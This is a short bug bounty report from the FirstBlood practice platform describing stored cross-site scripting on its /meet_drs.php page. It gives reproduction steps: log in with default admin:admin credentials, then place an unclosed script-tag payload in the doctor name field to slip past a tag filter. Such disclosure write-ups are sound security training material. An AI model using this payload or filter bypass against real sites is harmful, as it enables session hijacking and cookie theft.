FirstBlood-#1268Stored XSS at meet drs.pho
This issue was discovered on FirstBlood v3

On 2022-12-09, ayush1098 Level 8 reported:

Hello Team,


I have found a Stored XSS on /meet_drs.php endpoint in the name parameter. There is a filter which works when we close the tag, if we didn't close the tag, the payload will be executed on meet_drs.php.

Steps To Reproduce:

Login with admin:admin credentials on login.php.

Go to drpanel/edit-doctor.php?id=4 endpoint and put this payload in name parameter.

<script src=""

The payload will be executed on meet_drs.php endpoint.


Cookie Stealing, Session Hijacking etc..

Thanks & Regards

Ayush Singh

P2 High

Endpoint: /meet_drs.php

Parameter: name

Payload: "><script src=""

FirstBlood ID: 54
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on the /meet_drs.php endpoint via a malicious doctors name